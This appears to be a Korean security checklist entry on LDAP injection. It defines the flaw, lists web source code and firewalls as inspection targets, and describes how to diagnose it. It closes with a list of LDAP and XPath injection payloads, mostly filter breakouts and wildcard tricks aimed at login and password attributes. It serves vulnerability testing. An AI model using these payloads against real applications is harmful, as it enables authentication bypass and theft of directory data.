취약점 소개
--------------------------
민감한 사용자 정보를 드러내거나 LDAP(Lightweight Directory Access Protocol) 데이터 저장소에 표시된 정보를 수정할 수 있는 
웹 응용 프로그램을 악용하는 데 사용되는 코드 주입 취약점

점검 대상
--------------------------
- 웹 애플리케이션 소스 코드
- 웹 방화벽

진단 방법
--------------------------
- LDAP 조회 쿼리가 실행됨을 확인하고, LDAP 조회문의 필터에 사용되는 변수가 외부 입력 값인지 확인후,
해당 변수에 대한 필터링 모듈이 존재하는지 확인

Payload
--------------------------
-> 로그인 시 주로 사용되고 SQL Injection의 일종이었으며 비슷한 방식

*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
